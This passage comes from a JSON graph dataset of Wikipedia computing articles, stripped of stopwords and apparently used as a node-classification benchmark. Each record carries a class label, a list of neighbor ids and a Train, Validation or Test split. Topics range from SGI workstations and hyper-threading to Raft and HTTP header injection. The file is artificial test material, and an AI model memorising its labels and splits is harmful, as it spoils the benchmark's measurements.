    "text": "SGI_Visual_Workstation:sgi visual workstation sgi visual workstation series workstation computers designed manufactured sgi unlike product lines used 64-bit mips risc architecture line used intel pentium ii iii processors shipped windows nt 4.0 windows 2000 operating system lieu irix however visual workstation 320 540 models deviated architecture ibm-compatible pcs using sgi arcs firmware instead traditional bios internal components adapted mips-based products proprietary components made incompatible internal hardware designed standard pcs hence unable run versions microsoft windows especially windows 9x contrast remaining models line standard pcs using via technologies chipsets nvidia video cards standard components two series visual workstations based intel processors first series 320 540 used sgi arcloader prom cobalt video chipset remainder essentially standard pc 320 540 use unified memory architecture uma memory system shares video system memory runs speed allows 80 percent system ram applied video memory allocation static however adjusted via profile 320 540 also use onboard cobalt video adapter sgi proprietary graphics chipset firmware used systems prom enables booting graphical subsystem os loaded regard resemble irix/mips line sgi computers sgi o2 320 540 also stand firewire ieee 1394 ports onboard composite/s-video capture usb keyboards mice differ 320 dual pentium ii/iii-capable 1gb maximum system ram 540 quad pentium iii xeon-capable 2gb maximum system ram computers use proprietary dimm module essentially ecc sdram pc-100 package one-half normal size maximum memory per module 96mb sgi 320 twelve memory slots firewire ports built 320 never functioned sgi distributed orange micro firewire cards year production commenced lieu fixing firewire ports 320 540 limited pci slots albeit two 66 mhz one 33 mhz slot operated 3.3v step 5v slots used manufacturers limits number accessories added visual workstations built compete new intel processor based workstations considerably cheaper sgi line mips workstations little standard pcs use many parts also available aftermarket 320 540 visual workstations shipped originally microsoft windows nt 4.0 due arcloader prom custom hardware abstraction layer hal windows necessary windows 2000 last release included required sgi-specific hal sgi ceased supporting visual workstation series installation later windows versions xp unsupported 230 330 550 also supported windows nt 2000 addition sgi offered systems pre-loaded release 6.2 red hat linux distribution systems letter l appended model numbers various sgi enhancements particular 320 540 visual workstations often out-perform intel pcs similar configuration graphically-intensive memory bound applications however due hefty upgrade costs non-standard components cost effective purchase entire new higher-spec non-sgi pc rather purchase upgrades visual workstation visual workstations support conventional crt monitors vga display connectors 230 330 550 models use nvidia quadro cards also support dvi sgi 320 540 models shipped groundbreaking stylistically matched 1600sw lcd display using openldi display connector requires accessory flat panel adapter sgi o2 also supports 1600sw adapter model numbers visual workstations visual workstations initially equipped either single pentium ii pentium iii processor dual smp pentium iii processors 540 550 models support xeon implementation pentium series could support four xeons smp configuration two 550 although sgi visual workstation ever released cpu running higher 700 mhz hobbyists able run faster processors sgi 320 limit dual 1 ghz pentium iii processors single 1.4 ghz celeron dual 1 ghz processors require specific model cpu intended intel servers voltage regulator prom revision motherboard also correct setup work single processors powerleap pl-ip3t slocket adapter tualatin 1.4 ghz celeron processor limit straight bolt-in installation tualatin core gives modern processor powerleap adapter handles voltage regulation cpu sgi 540 reported handle 900 mhz quad xeon processors fastest pentium 3 xeons 100 mhz front side bus speed 540 230 330 550 models essentially standard pcs capabilities upgrade limits pcs time 230 330 based via chipsets used socket 370 processors conventional sdram 550 used slot 2 xeon processors intel 840 chipset rdram three models generic pc bios generic pc memory non-differentiated parts video cards systems used nvidia agp cards based quadro 2 chipset differ aftermarket quadros drivers",
    "neighbors": [
      5380,
      9353,
      5898,
      6797,
      5523,
      2452,
      5272,
      6942,
      6697,
      3883,
      3250,
      3764,
      7093,
      11447,
      7234,
      10051,
      3911,
      6858,
      9932,
      5076,
      7001,
      2909,
      221,
      6243,
      1515,
      108,
      5356,
      6129,
      1398,
      2811,
      1149
    ],
    "mask": "Test"
  },
  {
    "node_id": 7312,
    "label": 2,
    "text": "Object_access_method:object access method object access method oam access method z/os designed storage large numbers large files images number distinguishing features e.g compared vsam oam used conjunction db2 example use case oam would storing medical images db2 database running z/os oam created 1980s prototype product insurance company replace microfiche initially oam supported optical storage magnetic disks 1990s support magnetic tape added 2011 support added storage objects z/os unix file system—either zfs nfs 1990s object access method used canadian intellectual property office store documents related patent processing",
    "neighbors": [
      868,
      7272,
      1801,
      2616,
      4586,
      8393,
      10094,
      10958,
      3669,
      2168,
      11131
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7313,
    "label": 3,
    "text": "Hyper-threading:hyper-threading hyper-threading officially called hyper-threading technology ht technology abbreviated htt ht intel proprietary simultaneous multithreading smt implementation used improve parallelization computations multiple tasks performed x86 microprocessors first appeared february 2002 xeon server processors november 2002 pentium 4 desktop cpus later intel included technology itanium atom core series cpus among others processor core physically present operating system addresses two virtual logical cores shares workload possible main function hyper-threading increase number independent instructions pipeline takes advantage superscalar architecture multiple instructions operate separate data parallel htt one physical core appears two processors operating system allowing concurrent scheduling two processes per core addition two processes use resources resources one process available another process continue resources available addition requiring simultaneous multithreading smt support operating system hyper-threading properly utilized operating system specifically optimized furthermore intel recommends htt disabled using operating systems unaware hardware feature hyper-threading technology form simultaneous multithreading technology introduced intel concept behind technology patented sun microsystems architecturally processor hyper-threading technology consists two logical processors per core processor architectural state logical processor individually halted interrupted directed execute specified thread independently logical processor sharing physical core unlike traditional dual-processor configuration uses two separate physical processors logical processors hyper-threaded core share execution resources resources include execution engine caches system bus interface sharing resources allows two logical processors work efficiently allows logical processor borrow resources stalled logical core assuming logical cores associated physical core processor stalls waiting data sent finish processing present thread degree benefit seen using hyper-threaded multi core processor depends needs software well operating system written manage processor efficiently hyper-threading works duplicating certain sections processor—those store architectural state—but duplicating main execution resources allows hyper-threading processor appear usual physical processor extra logical processor host operating system htt-unaware operating systems see two physical processors allowing operating system schedule two threads processes simultaneously appropriately execution resources would used current task processor without hyper-threading especially processor stalled hyper-threading equipped processor use execution resources execute another scheduled task processor may stall due cache miss branch misprediction data dependency technology transparent operating systems programs minimum required take advantage hyper-threading symmetric multiprocessing smp support operating system logical processors appear standard separate processors possible optimize operating system behavior multi-processor hyper-threading capable systems example consider smp system two physical processors hyper-threaded total four logical processors operating system thread scheduler unaware hyper-threading treat four logical processors two threads eligible run might choose schedule threads two logical processors happen belong physical processor processor would become extremely busy would idle leading poorer performance possible scheduling threads onto different physical processors problem avoided improving scheduler treat logical processors differently physical processors sense limited form scheduler changes required numa systems first published paper describing known hyperthreading general purpose computer stanford ph.d. dissertation 1973 denelcor inc. introduced multi-threading heterogeneous element processor hep 1982 hep pipeline could hold multiple instructions process one instruction given process allowed present pipeline point time instruction given process block pipe instructions processes would continue pipeline drained us patent technology behind hyper-threading granted kenneth okin sun microsystems november 1994 time cmos process technology advanced enough allow cost-effective implementation intel implemented hyper-threading x86 architecture processor 2002 foster mp-based xeon also included 3.06 ghz northwood-based pentium 4 year remained feature every pentium 4 ht pentium 4 extreme edition pentium extreme edition processor since previous generations intel processors based core microarchitecture hyper-threading core microarchitecture descendant p6 microarchitecture used iterations pentium since pentium pro pentium iii celeron covington mendocino coppermine tualatin-based pentium ii xeon pentium iii xeon models intel released nehalem core i7 november 2008 hyper-threading made return first generation nehalem contained four cores effectively scaled eight threads since two- six-core models released scaling four twelve threads respectively earlier intel atom cores in-order processors sometimes hyper-threading ability low power mobile pcs low-price desktop pcs itanium 9300 launched eight threads per processor two threads per core enhanced hyper-threading technology next model itanium 9500 poulson features 12-wide issue architecture eight cpu cores support eight virtual cores via hyper-threading intel xeon 5500 server chips also utilize two-way hyper-threading according intel first hyper-threading implementation used 5 die area comparable non-hyperthreaded processor performance 15–30 better intel claims 30 performance improvement compared otherwise identical non-simultaneous multithreading pentium 4 tom hardware states cases p4 running 3.0 ghz ht even beat p4 running 3.6 ghz ht turned intel also claims significant performance improvements hyper-threading-enabled pentium 4 processor artificial-intelligence algorithms overall performance history hyper-threading mixed one beginning one commentary high-performance computing november 2002 notes hyper-threading improve performance mpi applications depending cluster configuration importantly nature application running cluster performance gains vary even negative next step use performance tools understand areas contribute performance gains areas contribute performance degradation result performance improvements application-dependent however running two programs require full attention processor actually seem like one programs slows slightly hyper-threading technology turned due replay system pentium 4 tying valuable execution resources equalizing processor resources two programs adds varying amount execution time pentium 4 prescott xeon nocona processors received replay queue reduces execution time needed replay system completely overcomes performance penalty according november 2009 analysis intel performance impacts hyper-threading result increased overall latency case execution threads result significant overall throughput gains vary application words overall processing latency significantly increased due hyper-threading negative effects becoming smaller simultaneous threads effectively use additional hardware resource utilization provided hyper-threading similar performance analysis available effects hyper-threading used handle tasks related managing network traffic processing interrupt requests generated network interface controllers nics another paper claims performance improvements hyper-threading used interrupt handling first ht processors released many operating systems optimized hyper-threading technology e.g windows 2000 linux older 2.4 2006 hyper-threading criticised energy inefficiency example specialist low-power cpu design company arm stated simultaneous multithreading smt use 46 power ordinary dual-core designs furthermore claimed smt increases cache thrashing 42 whereas dual core results 37 decrease intel disputed claim stating hyper-threading highly efficient uses resources would otherwise idle underutilised 2010 arm said might include simultaneous multithreading future chips however rejected favor 2012 64-bit design 2013 intel dropped smt favor out-of-order execution silvermont processor cores found gave better performance better power efficiency lower number cores smt 2017 revealed intel skylake kaby lake processors bug implementation hyper-threading could cause data loss microcode updates later released address issue 2019 coffee lake intel began move away including hyper-threading mainstream core i7 desktop processors except highest-end core i9 parts pentium gold gpus also started recommending disabling hyper-threading new cpu vulnerability attacks revealed could mitigated disabling ht may 2005 colin percival demonstrated malicious thread pentium 4 use timing attack monitor memory access patterns another thread shares cache allowing theft cryptographic information potential solutions include processor changing cache eviction strategy operating system preventing simultaneous execution physical core threads different privileges 2018 openbsd operating system disabled hyper-threading order avoid data potentially leaking applications software caused foreshadow/l1tf vulnerabilities 2019 set vulnerabilities led security experts recommending disabling hyperthreading devices",
    "neighbors": [
      7173,
      9224,
      9739,
      4108,
      5649,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      6184,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      8273,
      2140,
      1119,
      1122,
      4194,
      3175,
      7783,
      4204,
      8815,
      8820,
      630,
      8822,
      4217,
      7802,
      8315,
      6268,
      3197,
      6804,
      8855,
      9369,
      6815,
      8352,
      5793,
      6818,
      6821,
      5798,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      2237,
      4286,
      4797,
      5309,
      2241,
      2243,
      6339,
      3272,
      9932,
      5329,
      4308,
      10966,
      2264,
      731,
      7387,
      3294,
      11487,
      7911,
      10985,
      9964,
      5358,
      5871,
      1776,
      8944,
      757,
      2805,
      3317,
      10485,
      249,
      5883,
      8700,
      8447,
      1798,
      1801,
      6924,
      6926,
      6415,
      785,
      1298,
      8977,
      11539,
      4886,
      1304,
      3352,
      7963,
      9500,
      5922,
      2339,
      6950,
      2345,
      11050,
      4909,
      3886,
      7983,
      309,
      8501,
      5948,
      4928,
      833,
      8514,
      5444,
      5956,
      9541,
      4423,
      1866,
      8523,
      6476,
      7505,
      9044,
      11604,
      344,
      4444,
      8543,
      1376,
      10601,
      10603,
      9582,
      4465,
      10612,
      1399,
      7033,
      1402,
      10620,
      894,
      3457,
      3973,
      4491,
      9611,
      398,
      3470,
      5518,
      8590,
      5523,
      407,
      9111,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      8125,
      4030,
      9665,
      453,
      3014,
      1480,
      1998,
      977,
      466,
      2514,
      2516,
      3537,
      5073,
      1499,
      10205,
      1502,
      7134,
      5090,
      995,
      7653,
      7142,
      1000,
      7657,
      9707,
      8684,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "None"
  },
  {
    "node_id": 7314,
    "label": 3,
    "text": "The_Dam_Busters_(video_game):dam busters video game dam busters combat flight simulator set world war ii published u.s. gold 1984 loosely based real life operation chastise 1955 film game released 1984 colecovision commodore 64 1985 apple ii ms-dos msx zx spectrum 1986 amstrad cpc nec pc-9801 choose three different night missions increasingly difficult three goal successfully bomb dam practice run approach bomb dam without obstacles two missions feature various enemies overcome start either french coast british airfield flight control every aspect bomber seven crew positions pilot front gunner tail gunner bomb aimer navigator engineer squadron leader leaving positions unattended event could spell death person position rendering useless encounters must evade enemies plan approach set variables speed height timing etc execute successful bombing sometimes becomes necessary deal emergencies engine fires en route target expect encounter attacks enemy aircraft barrage balloons flak enemy searchlights events like flash along border screen indictating key press take station need assistance example flying enemy search lights 'll need man gunner station shoot lights ground left unattended expect flak enemy aircraft start damaging bomber begin final run target presented custom bombing sights made famous story toggle bomb shown animation bomb bouncing along lake hitting hitting target dam info rated dam busters commodore 64 three-plus stars five stating lacks depth variability game like silent service better average graphics play features computer gaming world gave dam busters two five points overview world war ii simulations stating product graphics 'feel make much game enough simulation",
    "neighbors": [
      2776,
      10931,
      9166,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 7315,
    "label": 3,
    "text": "Raft_(computer_science):raft computer science raft consensus algorithm designed alternative paxos meant understandable paxos means separation logic also formally proven safe offers additional features raft offers generic way distribute state machine across cluster computing systems ensuring node cluster agrees upon series state transitions number open-source reference implementations full-specification implementations go c++ java scala named reliable replicated redundant fault-tolerant raft byzantine fault tolerant algorithm nodes trust elected leader raft achieves consensus via elected leader server raft cluster either leader follower candidate precise case election leader unavailable leader responsible log replication followers regularly informs followers existence sending heartbeat message follower timeout typically 150 300 ms expects heartbeat leader timeout reset receiving heartbeat heartbeat received follower changes status candidate starts leader election raft implements consensus leader approach cluster one one elected leader fully responsible managing log replication servers cluster means leader decide new entries placement establishment data flow servers without consulting servers leader leads fails disconnects case new leader elected consensus problem decomposed raft two relatively independent subproblems listed existing leader fails start algorithm new leader needs elected case new term starts cluster term arbitrary period time server new leader needs elected term starts leader election election completed successfully i.e single leader elected term keeps going normal operations orchestrated new leader election failure new term starts new election leader election started candidate server server becomes candidate receives communication leader period called election timeout assumes acting leader anymore starts election increasing term counter voting new leader sending message servers requesting vote server vote per term first-come-first-served basis candidate receives message another server term number least large candidate current term candidate election defeated candidate changes follower recognizes leader legitimate candidate receives majority votes becomes new leader neither happens e.g. split vote new term starts new election begins raft uses randomized election timeout ensure split votes problem resolved quickly reduce chance split vote servers wo n't become candidates time single server timeout win election become leader sends heartbeat messages servers followers become candidates leader responsible log replication accepts client requests client request consists command executed replicated state machines cluster appended leader log new entry requests forwarded followers appendentries messages case unavailability followers leader retries appendentries messages indefinitely log entry eventually stored followers leader receives confirmation majority followers entry replicated leader applies entry local state machine request considered committed event also commits previous entries leader log follower learns log entry committed applies entry local state machine ensures consistency logs servers cluster ensuring safety rule log matching respected case leader crash logs left inconsistent logs old leader fully replicated cluster new leader handle inconsistency forcing followers duplicate log followers leader compare log log follower find last entry agree delete entries coming critical entry follower log replace log entries mechanism restore log consistency cluster subject failures raft guarantees safety properties first four rules guaranteed details algorithm described previous section state machine safety guaranteed restriction election process rule ensured simple restriction candidate ca n't win election unless log contains committed entries order elected candidate contact majority cluster given rules logs committed means every committed entry going present least one servers candidates contact raft determines two logs carried two distinct servers up-to-date comparing index term last entries logs logs last entry different terms log later term up-to-date logs end term whichever log longer up-to-date raft request candidate voter includes information candidate log log up-to-date candidate log voter denies vote candidate implementation ensures state machine safety rule follower crashes appendentries vote requests sent servers fail failures handled servers trying indefinitely reach downed follower follower restarts pending requests complete request already taken account failure restarted follower ignore timing critical raft elect maintain steady leader time order perfect availability cluster stability ensured respecting timing requirement algorithm broadcasttime « electiontimeout « mtbf typical number values 0.5ms 20ms broadcasttime implies set electiontimeout somewhere 10ms 500ms take several weeks months single server failures means values right stable cluster work https //groups.google.com/forum/ topic/raft-dev/95rzqptgpmu",
    "neighbors": [
      3267,
      7499,
      4781,
      5677,
      7085,
      3705,
      7409,
      8025,
      121,
      1435,
      11612,
      2910
    ],
    "mask": "Test"
  },
  {
    "node_id": 7316,
    "label": 3,
    "text": "Bit_Test:bit test codice_1 x86 assembly language instruction stands bit test added x86 instruction set 80386 processor codice_1 copies bit given register carry flag example copy third least significant bit eax carry flag codice_3 bit test set operates also sets bit register codice_4 bit test reset resets codice_5 bit test complement flips",
    "neighbors": [
      1915,
      6596,
      9911
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7317,
    "label": 2,
    "text": "Mark_Zbikowski:mark zbikowski mark zibo joseph zbikowski born march 21 1956 former microsoft architect early computer hacker started working company years inception leading efforts ms-dos os/2 cairo windows nt 2006 honored 25 years service company third employee reach milestone bill gates steve ballmer designer ms-dos executable file format headers file format start initials ascii characters 'mz 0x4d 0x5a zbikowski born detroit michigan 1956 attending roeper school known roeper city country school 1961 1974 developed interest mathematics computers 8th-grade performance michigan mathematics prize competition led invitation nsf-funded summer program oakland university became friends microsoft steve ballmer jeff sachs zbikowski pursued computer science harvard a.b 1978 yale s.m 1979 active universities gilbert sullivan performing groups ballmer recruited zbikowski joined microsoft 1981 march 1982 replaced tim paterson development lead manager microsoft ms-dos 2.0 position held dos 4.0 first major contributions addition hierarchical directory structure dos 2.0 installable device drivers march 1985 1991 architecture team os/2 development manager file systems device drivers technical advisor paul maritz breakthrough concept installable file system os/2 attributed following demise microsoft/ibm joint development agreement architect development manager key contributor cairo working jim allchin later anthony short led cairo object file system content index efforts 1996 cairo migrated standalone product technology source zbikowski worked lou perazzoli windows nt kernel focusing performance size becoming architect development manager nt file systems 1998 2001 zbikowski candidate director harvard alumni association zbikowski retired microsoft june 2006 due interest education became affiliated 2007 university washington lecturer computer science engineering department college engineering mark zbikowski affiliated following companies __notoc__",
    "neighbors": [
      5600,
      9762,
      3235,
      6148,
      2055,
      6921,
      9995,
      8301,
      9166,
      3323,
      8976,
      8115,
      9907,
      8986,
      2811,
      2942,
      1791
    ],
    "mask": "Test"
  },
  {
    "node_id": 7318,
    "label": 7,
    "text": "Xgrid:xgrid xgrid proprietary program distributed computing protocol developed advanced computation group subdivision apple inc allows networked computers contribute single task provides network administrators method creating computing cluster allows exploit previously unused computational power calculations divided easily smaller operations mandelbrot maps setup xgrid cluster achieved next cost xgrid client pre-installed computers running mac os x 10.4 mac os x 10.7 xgrid client included mac os x 10.8 xgrid controller job scheduler xgrid operation also included within mac os x server free download apple apple kept command-line job control mechanism minimalist providing api develop sophisticated tools built around program employs communication protocol layered top schema communicate nodes communication protocol interfaces beep infrastructure network application protocol framework computers discovered xgrid system computers mac os x xgrid service enabled automatically added list available computers use processing tasks initiating computer sends complete instructions job processing controller controller splits task small instruction packets known tasks design xgrid system consists small packets transferred xgrid-enabled computers network computers nodes execute instructions provided controller return results controller assembles individual task results whole job results returns initiating computer apple modeled design xgrid zilla program distributed next openstep operating system application programming interface api apple owned rights company also opted provide client version mac os x command-line functions little flexibility giving mac os x server version xgrid gui control panel full set features xgrid original concept traced back zilla.app found openstep operating system created next late 1980s zilla first distributed computing program released end-user operating system used idle screen-saver motif design feature since found widely used projects seti home distributed.net zilla national computerworld smithsonian award science category 1991 ease use good design apple acquired zilla along rest next 1997 later used zilla inspiration xgrid first beta version xgrid released january 2004 several organizations adopted xgrid large international computing networks one example xgrid cluster macresearch openmacgrid scientists request access large amounts processing power run tasks related research another defunct xgrid stanford project used range computers stanford university campus around world perform biochemical research pre-release promotional piece macworld cited xgrid among unix features 10 things know tiger calling handy work huge amounts experimental data render complex animations xgrid introduction 2004 infoworld noted 'preview grade technology would directly benefit xserve g5 launch later year infoworld commentator ephraim schwartz also predicted xgrid opening move apple entry enterprise computing market apple discontinued xgrid os x v10.8 mountain lion along dependent services podcast producer xgrid protocol uses beep network framework communicate nodes network system infrastructure includes three types computers communicate protocol one client communicates calculation next controller starts segregates calculation finally agents process allocated part calculation computer act one three components time xgrid protocol provides basic infrastructure computers communicate involved processing specified calculation xgrid targeted towards time consuming computations easily segregated smaller tasks sometimes called embarrassingly parallel tasks includes monte carlo calculations 3d rendering mandelbrot maps within xgrid protocol three types messages passed computers cluster requests notifications replies requests must responded recipient reply notifications require reply replies responses sent messages identified name type request/notification/reply contents message encapsulated beep message beep msg acknowledged receipt empty reply rpy xgrid leverage beeps message/reply infrastructure received message requires response merely generates independent beep message containing reply xgrid messages encoded dictionaries key/value pairs converted xml sent across beep network architecture xgrid system designed around job based system controller sends agents jobs agents return responses actual computation controller executes xgrid system known job job contains files required complete task successfully input parameters data files directories executables and/or shell scripts files included xgrid job must able executed either simultaneously asynchronously benefits running job xgrid lost job completes controller set notify client task completion failure example email client leave network tasks running also monitor job status demand querying controller although track ongoing progress individual tasks controller central correct function xgrid node responsible distribution supervision coordination tasks agents program running controller assign reassign tasks handle individual agent failures demand number tasks assigned agent depend two factors number agents xgrid number processors node number agents xgrid determines controller assign tasks tasks may assigned simultaneously large number agents queued small number agents node one processor detected xgrid controller may assign one task per processor occurs number agents network lower number tasks controller complete xgrid layered upon blocks extensible exchange protocol beep ietf standard comparable http focus two-way multiplexed communication found peer-to-peer networks beep turn uses xml define profiles communicating multiple agents single network internet connection possible access xgrid command line xgrid graphical user interface program bundled mac os x server march 2009 available online much efficient way administering xgrid system originally xgrid agent included mac os x version 10.4 installations gui reserved users mac os x server decision limited efforts computer community embrace platform eventually apple released mac os x server administration tools public included xgrid administration application bundled mac os x server despite lack graphical controller interface standard non-server mac os x distribution possible set xgrid controller via command line tools codice_1 codice_2 xgrid controller daemon running administration grid apple xgrid admin tool possible applications visualhub provided xgrid controller capability user interfaces",
    "neighbors": [
      4615,
      5647,
      1042,
      6700,
      4657,
      1074,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      2149,
      8303,
      6771,
      2676,
      7806,
      9343,
      3719,
      10888,
      11402,
      10387,
      8852,
      1686,
      3228,
      2207,
      1699,
      168,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      6855,
      713,
      9418,
      3790,
      3282,
      7378,
      8404,
      9430,
      3289,
      4318,
      231,
      9451,
      2288,
      7928,
      8441,
      7422,
      11521,
      2819,
      1796,
      10512,
      6421,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      9529,
      5956,
      4933,
      9035,
      6993,
      1878,
      865,
      4457,
      3449,
      2432,
      904,
      9100,
      9109,
      1439,
      5029,
      6093,
      7118,
      3035,
      4571,
      479,
      4068,
      5093,
      487,
      10221,
      5619,
      11257,
      7163,
      8702
    ],
    "mask": "Test"
  },
  {
    "node_id": 7319,
    "label": 2,
    "text": "PSOS_(real-time_operating_system):psos real-time operating system psos portable software silicon real time operating system rtos created 1982 alfred chao developed/marketed first part life company software components group scg 1980s psos rapidly became rtos choice embedded systems based motorola 68000 family architecture written 68000 assembler highly optimised start also modularised early support os-aware debugging plug-in device drivers tcp/ip stacks language libraries disk subsystems later came source-level debugging multi-processor support networking extensions 1991 software components group acquired integrated systems inc. isi developed psos restyled psos+ microprocessor families rewriting greater part c. attention also paid supporting successively integrated development environments culminating prism+ july 1994 integrated systems acquired digital research modular real-time multi-tasking operating system flexos novell 1995 integrated systems offered psosystem/nest package novell embedded systems technology nest february 2000 integrated systems inc. acquired wind river systems originators rival rtos vxworks despite initial reports psos support would continue development halted wind river announced plans 'convergence version vxworks support psos system calls releases psos made nxp semiconductors acquired psos trimedia wind river continued support os trimedia vliw core march 2000 rival company express logic released evaluation kit psos+ users designed provide migration path threadx rtos august 2000 mapusoft technologies inc. came psos os changer porting kit smoothly move software multiple os linux vxworks includes ide api optimization along profiling tool measure api timing target boards www.mapusoft.com august 2007 rowebots former partner scg isi open sourced psos+ compatible version called reliant available wish upgrade without applications changes xenomai project supports psos+ apis others traditional rtos apis linux-based real-time framework allow existing industrial applications migrate easily gnu/linux-based environment keeping stringent real-time guarantees another open sourced alternative rtems support various apis including classic api compatible psos posix api compared gnu/linux rtems closer match psos applications due lower memory footprint strict realtime behaviour popular ssl/tls libraries wolfssl still support psos",
    "neighbors": [
      2179,
      6276,
      10883,
      9366,
      7319,
      2201,
      9628,
      10030,
      11383,
      6207,
      321,
      10561,
      1221,
      8262,
      9927,
      6985,
      9162,
      341,
      10590,
      6624,
      5603,
      5220,
      1253,
      1126,
      7269,
      4333,
      10482,
      5363,
      6263
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7320,
    "label": 8,
    "text": "SOAP-over-UDP:soap-over-udp soap-over-udp oasis standard covering publication soap messages udp transport protocol providing one-way request-response message patterns",
    "neighbors": [
      2501,
      7878,
      425,
      8203,
      10829,
      4974,
      4979,
      11413,
      10486,
      6811,
      2013,
      7198
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7321,
    "label": 8,
    "text": "Linked_data_page:linked data page linked data page web page explicitly describes one things objects via hyperdata links unlike traditional web page hypertext links hyperdata links expose properties attributes relationships property values associated things page linked data pages created hand generated dynamically via linked data server user agent single reference uri iri thing needed experience power serendipitous data discovery offered linked data page typical web page endowed links explicitly describe anything links simply expose unqualified associations documents web put differently linked data pages reveal explicit properties things basic web pages loosely anything requiring human interpretation reasoning order attain clarity",
    "neighbors": [
      53,
      119
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7322,
    "label": 4,
    "text": "PRODIGAL_(computer_system):prodigal computer system prodigal proactive discovery insider threats using graph analysis learning computer system predicting anomalous behavior among humans data mining network traffic emails text messages server log entries part darpa anomaly detection multiple scales adams project initial schedule two years budget 9 million uses graph theory machine learning statistical anomaly detection high-performance computing scan larger sets data quickly past systems amount data analyzed range terabytes per day targets analysis employees within government defense contracting organizations specific examples behavior system intended detect include actions nidal malik hasan wikileaks source chelsea manning commercial applications may include finance results analysis five serious threats per day go agents analysts operators working counterintelligence",
    "neighbors": [
      11330,
      612,
      7464,
      5589,
      7741
    ],
    "mask": "Train"
  },
  {
    "node_id": 7323,
    "label": 2,
    "text": "Zero_page:zero page zero page series memory addresses beginning computer address space page whose starting address zero size page depends context significance zero-page memory versus higher addressed memory highly dependent machine architecture example motorola 6800 mos technology 6502 processor families treat first 256 bytes memory specially whereas many processors actual size zero page bytes determined microprocessor design older designs often equal largest value referenced processor indexing registers example aforementioned 8-bit processors 8-bit index registers page size 256 bytes therefore zero page extends address 0 address 255 early computers including pdp-8 zero page special fast addressing mode facilitated use temporary storage data compensated relative shortage cpu registers pdp-8 one register zero page addressing essential unlike modern hardware 1970s computer ram fast faster cpu thus made sense registers use main memory extended pool extra registers since memory location within zero page 16-bit address bus computer may addressed single byte faster 8-bit data bus machines access location rather non-zero page location example mos technology 6502 one general purpose register accumulator result used zero page extensively many instructions coded differently zero page non-zero page addresses two instructions accomplish thing load value memory location 00 .a register accumulator however first instruction two bytes long requires three clock cycles complete second instruction three bytes length requires four clock cycles execute obviously difference execution time could significantly improve performance repetitive code zero page addressing mostly historical significance since developments integrated circuit technology made adding registers cpu less expensive cpu operations much faster ram accesses computer architectures still reserve beginning address space purposes though instance intel x86 systems reserve first 512 words address space interrupt table run real mode similar technique using zero page hardware related vectors employed arm architecture leading badly written programs infamous ofla behaviour program tries read information unintended memory area winds mistaking executable code text vice versa especially problem zero page area used store system jump vectors firmware tricked storing data fact quite contrary zero page original preferential use modern operating systems freebsd linux microsoft windows actually make zero page inaccessible trap uses null pointers useful null pointers method used represent value reference points nothing since code operating reference written assuming reference actually refers valid structure value catching case reference points nothing use since sure sign bug 8-bit cp/m zero page used communication running program operating system see zero page cp/m information",
    "neighbors": [
      11395,
      1801,
      6921,
      6797,
      8732,
      5412,
      6821,
      7589,
      2729,
      9911,
      823,
      4409,
      5457,
      5080,
      5598,
      5862,
      3050,
      1776,
      499
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7324,
    "label": 4,
    "text": "HTTP_header_injection:http header injection http header injection general class web application security vulnerability occurs hypertext transfer protocol http headers dynamically generated based user input header injection http responses allow http response splitting session fixation via set-cookie header cross-site scripting xss malicious redirect attacks via location header http header injection relatively new area web-based attacks primarily pioneered amit klein work request/response smuggling/splitting",
    "neighbors": [
      10466,
      5636,
      4198,
      7965,
      5934,
      119,
      5724,
      4797,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 7325,
    "label": 2,
    "text": "Shell_(computing):shell computing computing shell user interface access operating system services general operating system shells use either command-line interface cli graphical user interface gui depending computer role particular operation named shell outermost layer around operating system kernel cli shells require user familiar commands calling syntax understand concepts shell-specific scripting language example bash also easily operated via refreshable braille display provide certain advantages screen readers graphical shells place low burden beginning computer users characterized easy use since also come certain disadvantages gui-enabled operating systems also provide cli shells operating systems provide various services users including file management process management running terminating applications batch processing operating system monitoring configuration operating system shells direct interfaces underlying kernel even shell communicates user via peripheral devices attached computer directly shells actually special applications use kernel api way used application programs shell manages user–system interaction prompting users input interpreting input handling output underlying operating system much like read–eval–print loop repl since operating system shell actually application may easily replaced another similar application operating systems addition shells running local systems different ways make remote systems available local users approaches usually referred remote access remote administration initially available multi-user mainframes provided text-based uis active user simultaneously means text terminal connected mainframe via serial line modem remote access extended unix-like systems microsoft windows unix-like systems secure shell protocol usually used text-based shells ssh tunneling used x window system–based graphical user interfaces guis microsoft windows remote desktop protocol used provide gui remote access since windows vista powershell remote used text-based remote access via wmi rpc ws-management operating system shells fall one two categories command-line graphical command line shells provide command-line interface cli operating system graphical shells provide graphical user interface gui possibilities although common include voice user interface various implementations text-based user interface tui cli relative merits cli- gui-based shells often debated command-line interface cli operating system shell uses alphanumeric characters typed keyboard provide instructions data operating system interactively example teletypewriter send codes representing keystrokes command interpreter program running computer command interpreter parses sequence keystrokes responds error message recognize sequence characters may carry program action loading application program listing files logging user many others operating systems unix large variety shell programs different commands syntax capabilities operating systems single style command interface commodity operating systems ms-dos came standard command interface third-party interfaces also often available providing additional features functions menuing remote program execution application programs may also implement command-line interface example unix-like systems telnet program number commands controlling link remote computer system since commands program made keystrokes data sent remote computer means distinguishing two required escape sequence defined using either special local keystroke never passed always interpreted local system program becomes modal switching interpreting commands keyboard passing keystrokes data processed feature many command-line shells ability save sequences commands re-use data file contain sequences commands cli made follow typed user special features cli may apply carrying stored instructions batch files script files used repeatedly automate routine operations initializing set programs system restarted batch mode use shells usually involves structures conditionals variables elements programming languages bare essentials needed purpose others sophisticated programming languages conversely programming languages used interactively operating system shell purpose-built program command-line shell may offer features command-line completion interpreter expands commands based characters input user command-line interpreter may offer history function user recall earlier commands issued system repeat possibly editing since commands operating system 